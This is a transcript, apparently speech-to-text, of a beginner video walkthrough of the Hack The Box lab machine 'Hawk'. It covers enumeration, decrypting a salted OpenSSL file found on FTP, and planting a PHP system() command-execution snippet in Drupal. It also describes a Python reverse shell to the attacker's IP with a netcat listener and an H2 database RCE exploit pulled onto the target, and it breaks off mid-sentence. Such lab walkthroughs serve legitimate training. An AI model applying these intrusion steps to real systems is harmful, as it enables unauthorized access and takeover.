Hello everyone, this is Mutated Nuts, and today we'll be continuing our beginner friendly Road to SCP video series. Today we'll be looking at another Hack the Box machine, that is Hawk. Hawk is based on Linux and the difficulty is medium, so let's just get started. So first thing what I always do is I run an auto recon scan. If you guys don't know what auto recon is, it's an enumeration tool. It's gonna do nmap scan at first on the target machine, and it's gonna give you open ports and services like based on the nmap scan results. So it's gonna do additional scans on them. So 95% of the time it works great, but the rest of the time sometimes you have to manually enumerate things further. So it's good to have always, but then you should not always completely rely on it. So it's available on GitHub, you can get it from there. So I'll be running this tool as root, so I'll be giving sudo over here since I'm running the box as Kali. I'll be giving Python 3 in order to run this particular file. I'll be giving the target IP address as 10.10.10.102. In the case of Hawk, I'll be giving the O switch for output directory and the output location. So I already did execute the scan. So let's just look at the scan results. First thing what I always do is I look at the full TCP nmap scan. And if you look at the full TCP nmap scan over here, we see that we have multiple ports open. That is port 21. Obviously, when there are multiple ports open, it's good to go in order to check out anything in case you don't miss something, right? So we have port 21 open over here, which is running FTP, and it's running VSFTP 3.0.3. So that means it's like I don't think there's an exploit available for this, but another thing what we see is anonymous FTP login is allowed. So we'll look into this in some time. But yeah, we have FTP open, we have port 22 running SSH, and also we have HTTP. We have a web page over here which says like Drupal. So I think we had seen Drupal earlier also in a box, so it's running that. And we have a robots.txt file as well. So obviously we have few directories names mentioned over here, so we'll look into that as well. Also we have this 5435 TCP wrap. So obviously when you see your TCP wrap service, so you just try to run a very slow scan on this particular port. Okay, you can use the -T switch, okay, the T switch, T0 switch in nmap to particularly use the slow scan on this particular port, and maybe it may give you some value, but I did that and I still got TCP wrapped. So for some reason I was like, okay, maybe that's not the way or something. Okay, then we have 8082 running HTTP again. So it says like some H2 database HTTP console, so probably some HTTP application or something. We have like a get push method over here, so probably let's see if it's some web application or something like that. Then we have 9092 as well over here, which is running some XML registry service, something like that. Okay, so obviously we check out the entire scan result. I don't think we find something. So also what we'll do is we'll check out the UDP scan over here. Okay, so let's just quickly go to the top UDP scan. And if we look over here, we get port 161 UDP is open, that is running SNMP. Okay, so obviously there's an SNMP service running over here, and I did try to enumerate things when I did the box for the first time. I did try to enumerate and see if I get some information, but I was not lucky with that because I think it's running SNMP version 3. Yeah, so I was not able to get anything over here, but yeah, this port is open as well, so it's like don't forget to check your UDP scans too. Okay, so now we have in our full TCP. So let's just go see, since we have FTP over here, right? We have HTTP as well. But if FTP is present or SMB is present, like in Windows box especially, so I probably look at those first. So let's just look at the port FTP since we already have anonymous login present over here. So what we can do is we can just connect using FTP and 10.10.10.102. For some reason, okay, it says connection timeout for some reason, I'm not sure what, but yeah, let's just try it again. Okay, now we got it. So let's just enter the name that we can probably enter anonymous, and it says login successful. Okay, so that means we are inside FTP, and let's just try to do ls and see if we get something. We probably get a directory over here, okay, that is messages. So let's just go into that cd messages, and we have some hidden file over here. If you do ls, probably I don't think you'll be able to see it. Yeah, so that's a hidden file. So obviously just make it a habit to use lsla always, and in Windows use dir/a or get child item. Okay, so we have this Drupal txt encoded, something like that. Okay, so what we'll try to do is we'll try to get it into our system. So let's just use the get command over here, and probably you can just copy paste this as I think. Okay, copy it, and we're getting the file, and the file transfer is completed. Obviously you can check for put over here as well, try to upload the same file and see if it works, but it says permission denied, so obviously you do not have write access. And yeah, so what we'll try to do is we'll just go to back to the file. I think we were in the workplace directory, right? Okay, yeah, so obviously we are over here. Let's just close this thing, FTP. And since the file is hidden, obviously it's not visible over here. And what we'll try to do is just do lsla. We have this file over here, so let's just copy this, copy, and we'll just paste it into the exploit directory. So we'll not exploit, probably we can mention loot over here, and we can enter Drupal txt and enc. We can just rename the file as that because we don't want it hidden, because we'll have a look at it in the directory over here. So let's just leave it as it is, and it says no such file or directory. Okay, this file is present over here, right? Drupal text enc. My bad, I missed the slash over here. Okay, so we have this file over here, Drupal txt, and it looks like some encrypted or base64 data over here. So what we can do is, first thing, we can just check file and Drupal txt enc. Okay, obviously we have to go to the loot directory first, so let's just go over there and then check for file. So file is a tool which gives some information about the particular file, so let's just look into it. Drupal txt enc, and it says like open SSL encoded data with salted password base64 encoded. So that means there's a lot going on over here. Firstly, this whole string which we saw over here, that is base64 encoded, so we can try to decode it first, and then it says that it's an open SSL encoded data, obviously, and with a salted password. Sorry, not encoded, it's encrypted. So open SSL encrypted data over here with salted password. So what we can do is, for now, we know that we can do a base64 decode, right? That's encoding and decoding, so that's like fixed. You can encode and decode. So what we can do is we can just cat this particular Drupal file, Drupal.txt enc, and we can do a base64 decode on it. So we can just add the D switch and pipe this entire output over here. And if we see, we obviously get some funny data over here which says like salted probably, and so that's it. So we get some data over here. So what we'll try to do is we'll save this entire thing into a file, right? So we'll run the same step again, like the same command again, and what we'll try to do is we'll just enter we just create a new file that is probably Drupal.txt. That's it. Because obviously that will just remove the encoding because we have decoded that thing, right? So now obviously we already have some Drupal txt encrypted data. So obviously encryption, the way it works is you can only decrypt it if you have a key or a password. Okay, so that way you can only decrypt it that way. It's like you need you need a key for the lock. So what we'll try to do is let's just leave this aside for now, okay, and just look at some other port over here. So we are 22, we are port 80. Okay, so let's just look into that and see if we get something. 102, and we see that we come across some Drupal web application which we have seen earlier as well. It says powered by Drupal. So obviously you can try to check out for the default credentials over here. So we can just enter Drupal default credentials. So don't forget always, because this is a vendor specific, and I think it's a vendor specific application. It's not like some custom application over here. So obviously it will have some default login credentials or something similar, or some known exploits for the version. So we'll look into that later, but we have the admin login info over here which says admin and admin at 123. So let's just try that. Admin at 123. Let's just try to log in. It says sorry, unrecognized username or password. So that means obviously we can try to create an account as well, but it does not work. It will ask you for some administrator approval, send for admin approval, something like that. So what we'll do next is we'll just leave this aside for now. We have Drupal over here. Obviously whenever I see equal to sign and all, I try for LF5, but I was not successful over here. So what we can do is we can just check out GoBuster scan. So we can, I think there's an auto recon already. The GoBuster scan did execute over here. So let's just look into that. And we have this huge list of GoBuster scan over here, and it's like, we have a lot of many statuses over here. So we can just probably filter out for status 200 and see if we have something license key, readme text, index PHP, no robots. So obviously we have the robots.txt file, so we can look into that and see if we get something. So when I do the box first, obviously I look for multiple things over here to see if I get something interesting. But over here it says disallow changelog.txt. Okay, so if you guys want to know more about robot.txt, in short, it's like meant for Google search engines and other search engines, to stop crawling to these websites over here. Probably there's some, secret information present over here or something. So Google obviously obeys and like, okay, you know what, this thing says disallow, so I'm not allowed to enter over here, so I won't go there. But obviously there are some hackers or someone who's trying to get some additional information. They wouldn't go that, they wouldn't follow the rules, and they'll try to check out information over here. This robots.txt does not mean that access to these directories are denied. It's just a file which is present for the search engine. If you want to know more, I think I have spoken in the earlier Drupal video, so you can check out that box. The bast box, I guess. Yeah. So what we'll try to do is we'll just try to check the changelog.txt, and we have the changelog over here. So in the earlier version, like earlier box which we had done, in that the Drupal version was 7.52. Okay, and I think there was a very known exploit for that, and we could get inside. But over here we have the version 7.58. So probably you can check for this version if there are any exploit, but I don't think I could not find any exploit for this version. So obviously we have Drupal over here. We can run a Drupal scan as well to see if we get something interesting. So what we'll try to do is we'll just go back. Okay, we can run from here itself. So we'll just run a Drupal scan over here, and also we'll be giving the scan mode. Let's just look into it. Yeah, so we'll mention scan and Drupal, since we are using the Drupal application. I'm just using this usage over here. Okay, so and the URL, that is http 10.10.102. Okay, so this is what I'll do, and let's just run. It may take some time to actually run, and we can check out something different over here. We have user web config over here, but I don't think so there is anything present. Let's just look into it. Obviously, okay, we have a config file over here, but you do not get anything in particular present over here. Okay, so there's nothing, additional information which is like looks interesting. So let's just leave that. And XML, RPC and such things. Okay, so we got that thing now, and we got Drupal over here. We did run GoBuster, and you can try running small txt scan as well as medium in GoBuster. And I hope you guys know how to run GoBuster scans though. So you can check out my previous videos to run GoBuster scan, but this was already executed by the auto recon. So let's just look into it. If you want to know, we can probably do locate common txt or small txt at first. So I for now, like, I have started the small txt as base, so I don't use common txt anymore. But just to show in this video, you can use the common txt over here, and you can mention like GoBuster dir, then the use dir is for directory scanning, use switch for URL. We'll be giving the IP address 10.10.10.102, and then later on we'll be giving the word list over here, that is common txt, and we can give extension switches, that is PHP, TXT, HTML. It depends on the box. So if you have Linux boxes, you can give SH as well, and like PL, PY, and CGI, and all these files you can give, and you can give an output file, that is GoBuster, common, scan, txt, something like that. Okay, and you can give threads also, so like 40 or 100, something, it depends. So threads, like the more the threads, it's going to be faster, but don't give a huge amount, so that may slow your system maybe. So 40 is a safe bet, I guess. So you can run that, and the GoBuster scan starts. So I did already execute the scan. The auto recon did execute it, so I don't want to do it again. So let's just Drupal scan run for now. What we'll try to do is we'll just try to look into the other ports over here. Okay, so we saw port 80, let's just, okay, obviously we saw this as well. We can do a slow scan over here, but we still get TCP wrapped. So if you want to, okay, let's just quickly check this out. 5435, and we can do nmap. Okay, we can do it over here itself. So we'll do an nmap scan over here. So first we just need port information. Don't do SC, SV. We just need, okay, we can probably do SC, I guess. So SC, SV, yeah. And we'll probably do the T switch, T0. And the port, that is, we'll just give the port over here. That is 5435. So 5435 and 10.10.10.102. See, running GoBuster is fine. That's going to run nmap scan, automatically for you. But don't forget to actually manually run nmap scans. Sometimes you require to do a slow scan on these ports, or you require to do an all scan with max retries, like 5 max retries or 10 max retries. So you should always know how to do it manually as well. Having a tool is fine, but you should not forget, or you should always remember how to use it manually, or you can have a cheat sheet or something like that. Okay, so we have this present over here, nmap scan running. So let's see if it works, and if we get something, it may take some time, like 5 minutes, I guess, for this O scan. You can use 1 as well, but yeah, you can use O for most slow scan. And we have 8082. Sorry, so obviously whenever I see some non-standard port, I try to connect it and see if I get something using telnet, or you can use NC. So obviously the Drupal scan over here is done. We obviously get something like changelog, we get something like user login, as well as we get multiple plugins, image, profile, PHP plugin over here, and it says few themes and possible version this. Okay, so we can check out this particular login page, I guess. It's the same page which we had seen earlier. My bad. Okay, so this is the same login page. Obviously we can try using admin and that admin 123, but it does not work. So just try it. Admin 123 does not work. So yeah, so we'll just keep it on hold, and since we have 8082 over here, we'll just try to telnet over there and see if we get something. 8082. We do get something, I guess. It's stuck over here. Let's just enter some command. Hello. It says closed. Okay, so as soon as we enter, probably we can enter. It says it's closed. So what we'll try to do is, we'll just try to look into this 10.10.10.102 and 8082. So look into this, two things. First, check it out in telnet or NC, and then check it out on the web browser. Okay, so see, in obviously in this telnet, we do not get anything over here. You can probably try NC as well. So it's a connection tool which is being established from the server, I guess. So if you send any command, it just closes. So it's doing the same thing as telnet over here. And over here we see that we get something which says H2 console. Sorry, remote connection web allow others are disabled on the server. So it means that we cannot access it remotely. Probably we can access it, locally. So probably 8082 we do not find anything. So we can just mention 21. We've actually found some Drupal txt encoded, and port 80 we did not find anything as of now. So other thing is we have 8082. We did find something like remote access not allowed. Okay, just because there are many ports, so it may get confusing. So, and we have 9092 as well. So let's just try to connect that and see. We can use netcat, or we can use telnet as well. So it says over here that DB exception get JDBC SQL exception. So probably there's some SQL connection over here using the JDBC driver. I know you all may not be very well aware, but it is used for this SQL database connection, okay, from the Java application. So this is a Java application. Obviously, if you read over here, it says Java, right? And you get something like which says remote connections to the server are not allowed. So probably same error like this. So let's just do that as well, 9092. And paste this thing itself. Because obviously we got the same error, so let's just leave it as it is. Now what we'll do is, obviously the scan is still running, and we saw the other ports present over here as well, right, in our particular scan. And what we can do is we can obviously check out for the scan results, the other scan results which are present over here for port 80. Do not find anything interesting over here. You can check out for GoBuster as well on port 8082, but we did not get anything. So what we'll try to do is we'll just look into that file. That was the Drupal txt file, and what we can do is we have the loot directory over here. So let's just go back to our loot directory, we'll do lsla, and if we do cat drupal.txt, so obviously this is that salted file, and if you do file drupal.txt, so we have over here it says OpenSSL encrypted data with salted password. So now what we can do over here is we can just try and check out the word count of this particular file. The reason is whenever you encrypt some data, it's going to have an encryption algorithm, right? We cannot decrypt data randomly. In hashing also, we have multiple hash algorithms like, SSH 256, we have MD5 and so on. And in encryption, you have many algorithms which are present for symmetric encryption. So obviously, I hope you all know what symmetric asymmetric is. If you all don't know, you all can go on Google and check for it. But for now, we are concerned about symmetric, where we use only one key for encryption, one key for decryption. That means as good as you're leaving your house, put that key, lock it, and when you come back, use that same key again and open it. Okay, so something like that. So what we'll try to check is the word count of this particular Drupal txt file. So probably I guess you can use Drupal.txt and wc. So we see over here we have a word count of 176. I think we can do C for count. Yeah, so that is 176 over here. So that means probably 176 is divisible by 8 or 16. Divide by 8. Yes, so this we are getting, obviously we are getting, we are not getting any point and any other number over here. We are getting a whole number over here, so it's like 22. So obviously, in short, it means that we particularly have something over here present. Yeah, so we have a we can divide 176 by 8 over here. So that means what we'll try to do is we'll just see the encryption type of this particular Drupal.txt. Okay, so we can actually brute force, since this is an OpenSSL salted data over here. So we can try for open SSL brute force salted. Yeah, so we can check for this, and we come across a GitHub script over here which says like brute force salted OpenSSL. Okay, so this is the one, and we can probably use it, probably install it. I've already installed it in my system, so I don't think it's present by default. So you need to install it, and then probably we can use it over here. So first thing what we can do is we can just check out for okay, let's just check out that tool, brute force open SSL, and I think it meant salted open SSL. Okay, salted open SSL. Okay, so obviously if we just hit enter, there'll be multiple multiple switches present over here which we have to probably enter, and you can get something. So we probably require a word list, since we'll just try to brute force this, but obviously we'll not try to brute force like a manual brute force. We'll probably give a word list so that we can do a dictionary attack. So probably it can take out password from the rock.txt, which we always use to decrypt passwords. So we'll use that, provide that, and see if our password for this particular Drupal.txt file is present over there or no. So we have multiple things to use. We have to give the cipher information. Over here it says default cipher is AES 256 CBC. So if we look at OpenSSL over here, OpenSSL tool, which you can probably decrypt, encrypt things over here using multiple ciphers, and you can use help, I guess. So if we see, we have multiple cipher commands over here. Okay, so obviously we can pick out for the ciphers which are like very common. Okay, so AES like 128 is still common, 256 is common, and all these ciphers for AES we can consider all of these. Okay, and we can probably check out for other ciphers which are like having, it's a block cipher like divisible by 8 or 176. The thing with this is we saw earlier over there that 176 is present. In short, what happens is in block ciphers, suppose if your length of your data was like around 175, but if you encrypt it using 175 characters, and if you encrypt it using AES or something like some block cipher, is gonna add padding to it in the end so that it makes the whole block, because it has to be a completion of the whole 8 or 16 block that way. So it will make it 176 that way. So that's how we are getting it, that probably it's a block cipher, and probably there are multiple things like AES, and there are DES as well. DES is data encryption standard, the older version, and it's like kind of weak, and AES is the latest version, advanced encryption standard. So if you all want, you can check this out more on cryptography and everything. But what we can do is we can just check out the block size for AES, block size, and it says 128 bits, so obviously it comes to around 16 bytes. Okay, so bits, bytes, that's another thing. 1 byte is 8 bits, so that's how it comes to. So that means the blocks in AES would be consisting of 16, so that means 16 words at a time. So in short, what happens is if we just try to okay, let's just do print Python 3 C, use the print command over here and try to print a 176 times. Okay, so we did that, right? So what will happen is in AES, I'm just giving a like a high level overview, okay, of AES. If you all want, you can probably check it out on Google how AES works and everything. So block ciphers are like, it will consider this 4, okay, I hope that's 4, oh that's 9 I guess. Okay, so it will consider, sorry, since if it is AES, it will consider 16, just consider this as 16, okay, I'm not going to count. So let's just consider 16, it's going to take the first 16 A's and it's going to encrypt it first with the key. Okay, then probably it will take the other 16 A's and then encrypt it with the plain text, and there's a lot of process. So in short, the encryption process first will take this block, then it will probably take this block, then it will take this block, like fixed definite. So obviously if we enter 176, it's gonna be like, final, okay, you know what, that's done, I'll take the complete block. But what if we had entered like around 175 or 174 something? Okay, let's just do that. Let's just do 170 probably. So that means we are short of 6 A's over here. So then it will probably add padding over here, like probably 0, 0, 0 or something like that, in order to complete this block so that it can work. So that's how it works, and that's how the padding. So that's how 176 means either it can be 8 block or 16 block ciphers can be used. So that means AES over here is using 16 and DS uses 64 bits, so that is like your 8 bytes over here. So 1 byte is equal to 8 bits, so if you multiply, that's going to be 64. So that's how it works over here, and if you all want more, obviously you all can go more in depth over there and get to know the block ciphers and check out for each and everything if you use brute force. Okay, now coming back to our brute force salted open SSL, I think we require the raw QTXT first. Sorry. Okay, we require the raw QTXT because that's the password word list. I hope you guys all are aware by now this word list. So what we can do is we can just try to run open brute force salted. Okay, let's just copy these ciphers over here. Just copy this over here for now. Okay, just ignore the format, but yeah. So we have brute force salted open SSL, and we can use, let's just run this first and get the commands over here. We can use the F switch over here, which reads passwords instead of generating them. Okay, so important to use read the help page, and we can use that. Okay, my bad. Earlier we had copied that raw QTXT. Let's just take that, copy it again. Brute force F raw QTXT. Now, other thing is we have to enter the file name. That is the file which we want to brute force the password against. So that is your Drupal txt. Do not use this encoded one because we have already decoded, right? So use the Drupal txt as we had seen earlier. We had decoded already. So let's just use that as a file name. So that is drupal.txt. Okay, and we have to give the cipher over here. Okay, obviously the default cipher over here is this and default is this. So if you do not enter anything, it's probably going to run. But what we'll try to do is we'll just enter the ciphers, that is C, and we'll enter this particular cipher for now. Let's just see what happens. And D cipher which says MD5, so add that. You do not require to, you do not have to actually add these ciphers, because by default it's going to take some value. So you do not have to enter the switch, but I'm just trying to show you all how it works. Okay, let's just enter this, let's just press enter and see what we get. I think, my bad, Drupal txt, the MD5 got copied over here. So it may take some time to run. It says, using dictionary mode, because obviously we gave this word list, right? I hope you all are aware about the common term dictionary attack, brute force attack. Brute force is like, trying to see all possible combinations and everything. Okay. So it says warning, and it says password not found, and it says file might have been encrypted with a different cipher or different digest. That is, OpenSSL uses MD5 and OpenSSL 1.1 uses SSH 256. Now what I would try to do is I'll just remove this SHA 256 because it's suggesting me some cipher over here, right? Sorry, not cipher, the hashing algorithm. It's suggesting me SHA 256. So let's just use that and hit enter. And we already get a password candidate which says friends. So we already have a password over here. That means the key for our particular file. Okay, this is not the actual decrypted data. Okay, this is just the password of that file. So now we got the key. So we got the key, we have the encrypted data, we can get the decrypted data. Okay, so it's as good as A plus B is equal to C. So just write it over here. A plus B is equals to C. Okay, sorry, that is the encryption part, and I said it in the wrong way. This would be like plain text. Okay, plain text, and this would be the key, and this C would be the decrypted data. Sorry, my bad, encrypted data. Okay, so now what in our scenario we had the key. Okay, we actually got the key. We did not have the key. We only had the encrypted data. We required these two things, or probably one thing over here, so that we get the other thing. Now we got the key as well, right? Another thing is, I used this AES 256 over here because by default it was present over here, and this is the most used cipher now currently. But if I did not find anything, I would just try to manually check out AES 128, CBC, ECB. ECB is like the old block cipher version, older, like it's little weaker than CBC. You can check that out on Google as well. But yeah, if you all want to know more advanced way, you all can check out Ipsek's video, and he tries to create few files using all the ciphers and tries to check out the word, like the count of each encrypted file, and he tries to match and try to get this entire list into a small list, and you can try to check out each manually. Then you can do that as well, but obviously over here we got lucky, so we'll just probably use this 256 over here. If we did not get anything, obviously we'll try to use others as well. So even though after doing that also you do not find anything, obviously you can just try to probably this word list did not work for you because the password is not present in the word list. Okay, so that's just one thing. So we got the password over here which says friends. So in short, we got the key over here, so we can just add friends over here. Now we have B, now we have C. Obviously if you do the mathematical formula, it's very easy, right? It's not some groundbreaking thing. You can just remove this over here and add this over here. Not add, it will become subtract, because it was addition in the left, so it will become subtraction over here. So the encrypted data would be present, and we'll minus the key over here, so probably we'll get the plain text. Okay, so this is what it is, minus in the sense I'm just trying to remove that key so that we get the plain text over here. So now what we'll try to do is we'll just try to use this OpenSSL how to decrypt OpenSSL file. So we have this Stack Overflow page over here which says like, you have this encryption algorithm. So obviously when that Drupal txt enc file was created, in this way. So now we need to decrypt it. So we'll use this particular thing, okay, over here. We can obviously check out for multiple things. The D switch is obviously for decryption over here, and we have AES 256 present over here itself. And I think A is for the encoded data, I guess. Yeah, I'm not sure, but let's just see. I think for encoded there's a different version over here which mentions ENC over here. Okay, let's see what A is. Oh, A is base 64 if base 64 is present. So obviously what we'll try to do is we'll just enter the Drupal txt over here. So A is for, obviously if base 64 is present, you want to decrypt it, so you can add that A over there, base 64. Okay, we have Drupal txt, and we can just enter secrets.new and see if we get something in our secrets file. Let's just hit enter, and we are asked for a password, obviously because we took all the effort over here to get a password. So let's just take that, paste it, friends. It says error reading input file. So obviously we gave the A switch over here, so we need to enter, that's what I wanted to show, that we needed to enter the ENC file, the base 64 file. So enter that because we gave the A switch, okay, and if we do that, enter friends again, and we got something over here. So obviously that decryption is done. We got the secrets file over here. What I want to try to show you all now is that if you remove the A probably and you just enter Drupal txt, I think this is going to work as well, because now Drupal txt was our base 64 decoded file, okay. So if you do that, if we enter friends, yeah, so it does work. So obviously you give A, that means it will consider that, hey, this is base 64 encoded. If you do not give A, it will be like, hey, this is base 64 decoded, like a proper, there is no base 64 encoding done over there. Okay, so we have secrets, two secrets, and we can just check these files over here. It says Daniel following the password for the portal. This is the password probably. Please let us know when the portal is ready. Kind regards, IT department. So obviously we have a password over here, and we can do two things. We can check it in FTP as well, that Daniel user and user's password. I don't think it works. So obviously I wanted to show both the secrets file. It's the same thing, one and the same thing. So what we'll try to do is, we have a username over here, we have a password over here. We can just mention, just delete this for now, we do not require it, and we can enter potential username, that is Daniel, and the password, that is this pencil keyboard scanner. So we add that, and let's just use it in our particular user account. I guess the home page. Let's just go to the home page, and we'll enter Daniel and the password. Copy it, paste it. Does not work, so probably let's just try capital D, because over there secrets it mentioned it was present as capital D. So add that, does not work again. So obviously another thing is, you have Daniel, you have the password, for some reason it does not work. Earlier we saw, right, the default password for this was like admin and admin at 123. So what we'll do now is, let's just use that admin over here and use the password, and we get access over here. So that means we are like hello admin over here, and if we check out multiple things, we can go and try to manually enumerate things further. Over here there are two things. Obviously when I first did the box, try to check out multiple things present over here and see if you get something, okay, and we see that we can probably create some content over here which says add content. We can add an article. So in short, it's like WordPress, right? You're creating a web page or something, so probably we can add some reverse shell or something like that. And we have the text format which says filtered, full HTML, plain text. We have image upload as well. I tried to play around with this as well, but I did not succeed over here. Try to bypass that particular PNG and all these kind of things. So obviously we have this thing present over here. We can just create an article, but the text format would be something different, like HTML and all. So I don't think we can have a reverse shell using HTML. So what we'll try to do is, we can just try to check out that Udp Scan which we saw, and we saw some PHP module, right? Probably it's just hinted us for some module, and we can check out the modules directory over here, And obviously you have to check out and enumerate things, everywhere, like each and everything. I saw this equal to sign, I checked for LFI. It's just common scenario. It's not going to be like, hey, you know what, this box had something over here, but the other box may have something like an LFI. Or if you try to create some content, you can try to get a reverse shell, try to upload an image, so that way. So it just, that's how it is. You have to just manually enumerate things. And obviously this is a vendor specific application, and if there are no known exploits for that particular this, then chances are a bit less. But then obviously you can check out modules, and we can check out for this PHP filter over here. So you can just enable it. Okay, allows embedded PHP code snippets to be evaluated. That means we can run PHP code. So we do know what happens when we run PHP code, right? So we saved it. It says text format created. Close it. Let's go to content, add content, article, and we can just probably add something like nuts, and tags probably like test, probably the body. So we'll enter a PHP code over here, that is PHP echo system and request. So we are getting a parameter over here. We can even add a complete PHP reverse shell, from Pentesting key, the entire file over here. But I always try to keep it a little bit simple, because if you error out, you do not know that you are actually getting RC or no. So you'll be waiting for the shell. You will not know that you are actually getting RC. You can try a small command, and probably you can paste that other big reverse shell. So you start with this in the text format. Now we see that we have PHP code over here. So let's just hit that and save it. This command is basically, the parameter over here. So it will just add some parameter which says CMD. Then we can probably enter something like who am I or something like that. Okay, so I'm not going to do that now. So just save it. Get saved. We come to node 1. We get few errors over here. It says CMD in eval. So probably that code which we are executing, it's present in this page itself. Okay, that article which we wrote. So this is the node 1 page. Obviously we did not get something like article.php or something. Just consider we are getting this error now. So what we can do is just press this question mark, do CMD, you can do who am I. You can enter any command over there. We had enter CMD, right? You can enter anything over here in that request thing. You can enter your name, anything. So now if you see over here, we have successful remote command execution. Okay, so if you do who am I, and now obviously we do host name, so we got hawk. Okay, so that means we have successful command execution over here. What we can do is we can just go preferences, XY. You'll try to set up a burp suit so that we can intercept that request, and we can try to get a proper reverse shell. We'll just leave it as it is 8080. We set the Firefox proxy. We go to burp suit. Start this. Alright, okay, so we have the burp suit. I usually turn the interceptor off unless I need it for something, but I keep it off. I like to look at the HTTP history. Just close this and refresh it. I just need that host name thing. So you get multiple requests over here. Get request. The one which we are interested in, the CMD host name, we'll just send it to repeater. Hope you guys know what burp suit is doing over here. It's acting as a proxy. So the connections which are coming from Kali to Hawk is going through burp suit over here. So we can probably modify the request. Let's go and let this. Okay, so we can probably modify the request, and we can send it to our target machine. So we have host name over here, and we can try to add which Python, and we have a space. So please make sure you URL encode it using Control U. And obviously we get that Drupal page over here. It's a huge list, so you can probably check for. Okay, what we'll try to do is, because for some I'll just show you all, if you do which plus Python, we do not get any data over here. And if you guys know, if you do which Python and if you do not have that file present, so if you just consider this over here, which file not present, like just some binary which is not present or tool, it does not give you any output. So that means Python is not present. If you do which Python 3 and we get user bin Python, that means Python 3 is present. Okay, so we can probably add that over here, send it, probably just search for Python 3. We get a command over here which says, no, my bad. We did get a reply, but I'm not sure why it's not coming over here. Okay, let's just check below. Okay, so this is where we have to look for, okay, Python 3. Okay, now what we'll try to do is we'll just try to upgrade the shell. So we have Python 3 over here. We can just go to Pentest monkey, reverse shell, get the Python reverse shell over here. We can probably check for which bash as well. Obviously bash would be present. Sometimes it does not. So you can just enter if we get some bash result. Or we could have entered that, some property, this thing, and search for it. So we do have bash. So what we can do is we'll just paste that Python 3 exploit. So obviously we have this Python present. So make sure you enter 3 so that we have Python 3. We can change this sh to bash. We have to change the IP address, attack machine's IP address 10.10.14.28. That is my Kali machine's IP address, and port, that is 4444. We'll just set up a listener over here. So we'll just go to CD exploits first and then set up a listener, that is NCNVLP 4444. Okay, we have the listener set up. We have this thing. Obviously do not leave it as it is. I think there's no space over here between this quote. So make sure that there is a space between this and HTTP. Sometimes otherwise I will be breaking the head, and if it does not work. So just press Ctrl U and try to send it. See if it works. We do have a shell over here. We do who am I? Obviously will be as www data. And let's just go to the home directory. We have a user Daniel, so let's just go there and see if we get a user user file. Yeah, so we do get our user txt file, and we can very well read it over here because we belong to the others directory. In short, everybody can read it because read access is given over here to the others. So we can read this user txt file, and so what we'll try to do now is obviously get our privileges to root. So if we do uname a, we have 64-bit OS. We do that. Obviously, first time when I do the box, I do this. I check for sudo L as well. We do not get anything. Also, we check for Linenum scan. So another thing, what I would do is I upgrade the shell as well, like using. So we probably can do Python and import and upgrade your shell. So let's just do that. Python 3 C import pty dot spawn bin bash. Okay, let's just do that. That's done. Press Ctrl Z, then press http raw echo, and then press FG. I'm actually pressing FG and just hitting enter. So we get this again. I did not enter this NCNVLP, it came from the previous one. And enter reset, and then terminal time, probably enter screen. Okay, do get it over here. So this is like probably you can use arrow keys and all over here, and the previous commands what we did run. Okay, now what we'll do is we can just probably check out for PS AUX. We can do Linenum over here and get all the information. I'm not sure why this thing is coming out this way. My bad. So let's just check out for processes which is running by root. For some reason this thing is acting weird over here. It's not displaying the entire thing. So let's just do grep root, because we'll just look for commands which are running as root, and there's some bug in the box, I'm not sure, or it's in the console. But yeah, we have the root command over here. We can obviously check for Daniel user as well, because we saw that there was a folder Daniel, right? We can check for other directories and folders present over here. We see that we have few processes away. Obviously, I go and check out for multiple processes, if it does not look familiar, but I just know that, cron f is obviously going to run, and probably I'll check pspy as well if I find something. But we see over here we have bin sh, which is running Java, and it is running that h2 database, and that is running as root. Okay, so this thing is running as root, and it's running obviously this Java file, and the jar file given is this, what do you say, h2. And over here we get a h2 database version, I guess. Okay, so we can just probably copy this. Can mention interesting things to look at. So when I first do the box, I make these things over here, and I add like multiple things, and I look into it one by one, because when I'm doing the scan, I just copy paste and look into it one by one. So what we'll do is we'll just go into this directory at first, because root is running some file that is this opt something like that. Okay, so if we can write that file, probably we can have a reverse shell. So ls okay, so we can go to opt, and we have h2 over here, but for some reason we do not have access to it, and the users 1000 and 100 and 1004 have it. I'm not sure whom does that belong to. Let's just do etc password, and the user with probably use this is 1000 grep for 1000. It's 1000, right? Grep 1000. Okay. I'm not sure whom does it belong to, but there's one other group as well. So let's just check etc groups. Sorry, group. Yeah, so we have this LP admin. So this is the user present over here, I guess, LP admin, and we can check out for the 4.1 as well. I don't think so. I'm not sure why that thing is not coming, but yeah. So in short, we do not belong over here, I guess. So we can just enter groups and see we belong to the groups that is www data. Okay, so what we can do is we do not have access to this file. If we check over here, and we have something which is called L shell. You can go and check that out, I guess. I'm not sure if that is very interesting. So in order to privilege escalate now, there are two parts over here which you can do. One we can do, it's like kind of easy, and the other part is kind of tricky, but you get to learn something about port forwarding over there. So what we'll try to do is we have this version over here, right? So let's just try to search for exploits using search exploit. Just close this, just go back to the exploit directory, and search exploit we can do h2, and we get multiple exploits over here. It says h2 database, so this is the one which you are looking for, because in the scan result as well we saw h2 database, right? Full TCP nmap 8080 h2 database HTTP console, but we did not have a version over here. But now we have a version that is 14196, that is this thing over here. So it says Java web apps, so let's just copy that, search exploit, and use mswitch for mirror, so it will copy the exploit to our current working directory. Look into the exploit and just read it. In short, it's, if you look into this exploit, it says over here, this take advantage of something, this database has a password that is unknown. It is still possible to get the execution by creating a new database. So in short, if you read this exploit, it's like even if you do not know the password, for some vulnerability present over here, it can create a database and you can achieve remote command execution. Okay, so the attacker is logged in automatically. So this is what it says, and you get unauthenticated remote command execution. So that means we can get RC done. Now, if we have RC successful, because the exploit was running as root, because root we had seen earlier, right? Root was running the exploit. Since we have RC on this, we'll get remote command execution as root. Okay, so that's what it is. Python, let's just rename it exploit 1 py, We do not have to change anything because we have to add parameters over there. So let's just leave it as it is, not enter anything. What we'll try to do is take this and try to send it over Python. So we'll do that. Python HTTP server. So Python 3M HTTP server. Okay, and we can just transfer the file. Okay, so we'll just go back to cd. We'll be using dev SHM over here. Like in previous earlier boxes I used to use dev SHM, but most boxes I used to use the TMP folder. But there is some issue with the TMP folder which we may see later, so that's why let's just use dev SHM since start. We can use that as well, like temporary directory over here, so we can use that. So we can have our files present over here. So we'll just use wget 10.10.14.28 8000, and we can give the the file name, that is exploit1.py. Okay, so we got the file name present over here, and we got the file in our attack machine. We can chmod it to 777 or 744. Let's just leave it 777. It's in attack machine, target machine. My bad, I transferred the file to the target machine. It's not the attack machine. So exploit1.py. So let's just run this. Since we do not have Python, we have Python 3 over here. So let's just run that using this. And it says like some error, you have to enter some argument, that is host this. Okay, so obviously that means earlier, why I'm using 